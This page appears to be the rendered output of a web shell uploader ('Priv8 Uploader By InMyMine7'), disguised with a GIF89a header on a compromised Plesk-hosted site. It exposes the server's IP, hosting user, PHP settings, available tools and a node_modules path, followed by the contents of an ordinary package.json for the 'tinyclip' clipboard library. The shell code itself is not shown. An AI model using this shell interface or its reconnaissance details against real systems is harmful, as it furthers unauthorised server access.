GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.216.147 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/tinyclip/ |
Upload File : |
{
"name": "tinyclip",
"packageManager": "pnpm@10.30.1",
"version": "0.1.12",
"description": "A tiny utility to interact with the system clipboard.",
"keywords": [
"clipboard",
"copy",
"paste"
],
"files": [
"dist"
],
"homepage": "https://github.com/tinylibs/tinyclip#readme",
"bugs": {
"url": "https://github.com/tinylibs/tinyclip/issues"
},
"repository": {
"type": "git",
"url": "git+https://github.com/tinylibs/tinyclip.git"
},
"license": "MIT",
"author": "Tinylibs Maintainers (https://github.com/tinylibs)",
"type": "module",
"main": "./dist/index.js",
"exports": {
".": {
"default": "./dist/index.js"
}
},
"engines": {
"node": "^16.14.0 || >= 17.3.0"
},
"scripts": {
"build": "tsgo --build",
"test": "vitest run",
"format": "prettier --write .",
"lint": "pnpm lint:format",
"lint:format": "prettier --check ."
},
"devDependencies": {
"@types/node": "^25.3.3",
"@typescript/native-preview": "^7.0.0-dev.20260228.1",
"@vitest/coverage-v8": "^4.0.18",
"prettier": "^3.7.4",
"vitest": "^4.0.18"
}
}